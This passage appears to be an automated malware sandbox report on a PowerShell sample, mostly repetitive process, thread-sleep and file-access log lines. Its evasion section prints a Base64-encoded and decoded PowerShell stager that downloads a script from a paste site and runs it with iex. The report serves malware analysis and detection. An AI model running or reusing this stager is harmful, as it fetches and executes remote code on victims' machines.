      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4427
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1462
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3263
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6514
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep count: 4427 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep count: 332 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep count: 1462 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 3263 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 6514 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4616Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, type: DROPPED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $RD = [bool]@(0x01BE);$UO = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aHR0cHM6Ly9yZW50cnkuY28vZHl6NjY1cmIvcmF3"));$CO = New-Object Net.WebClient;$SOF = $CO.DownloadString($UO);iex $SOF;$null = [System.Collections.ArrayList]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $RD = [bool]@(0x01BE);$UO = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aHR0cHM6Ly9yZW50cnkuY28vZHl6NjY1cmIvcmF3"));$CO = New-Object Net.WebClient;$SOF = $CO.DownloadString($UO);iex $SOF;$null = [System.Collections.ArrayList]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep remotesigned -w 1 -enc "jabsaeqaiaa9acaawwbiag8abwbsaf0aqaaoadaaeaawadeaqgbfackaowakafuatwagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgaigbhaegaugawagmasabnadyatab5adkaeqbaafcanqawagmabgbrahuawqayadgadgbaaegabaa2ae4aagbzadeaywbtaekadgbjag0argazaciakqapadsajabdae8aiaa9acaatgblahcalqbpagiaagblagmadaagae4azqb0ac4avwblagiaqwbsagkazqbuahqaowakafmatwbgacaapqagacqaqwbpac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajabvae8akqa7agkazqb4acaajabtae8arga7acqabgb1agwabaagad0aiabbafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4aqqbyahiayqb5aewaaqbzahqaxqa="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep remotesigned -w 1 -enc "jabsaeqaiaa9acaawwbiag8abwbsaf0aqaaoadaaeaawadeaqgbfackaowakafuatwagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgaigbhaegaugawagmasabnadyatab5adkaeqbaafcanqawagmabgbrahuawqayadgadgbaaegabaa2ae4aagbzadeaywbtaekadgbjag0argazaciakqapadsajabdae8aiaa9acaatgblahcalqbpagiaagblagmadaagae4azqb0ac4avwblagiaqwbsagkazqbuahqaowakafmatwbgacaapqagacqaqwbpac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajabvae8akqa7agkazqb4acaajabtae8arga7acqabgb1agwabaagad0aiabbafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4aqqbyahiayqb5aewaaqbzahqaxqa="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
